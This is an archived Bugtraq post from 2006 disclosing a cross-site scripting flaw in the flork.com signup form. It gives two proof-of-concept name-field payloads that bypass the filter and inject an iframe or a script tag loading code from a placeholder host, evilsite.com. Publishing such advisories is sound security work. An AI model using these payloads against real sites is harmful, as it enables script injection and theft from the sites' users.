Flork.com

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Flork.com
From: luny@xxxxxxxxxxxxxxx
Date: 10 Jun 2006 20:49:42 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Flork.com

Effected files:
input boxes when creating a new user

XSS Vulnerabiliy:

We notice by adding empty tags and endingand beginning brackets we can bypass 
the filter of the flork.com signup.
For PoC try adding either one of the below codes in as your name:

">'>'><iframe src=http://evilsite.com/scriptlet.html <<"<'<'

">'>'><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><'<'

Prev by Date: Re: SSL VPNs and security
Next by Date: Yourfacesucks.com - XSS & cookie disclosure
Previous by thread: Onlinenode.com - XSS
Next by thread: Yourfacesucks.com - XSS & cookie disclosure
Index(es):
- Date
- Thread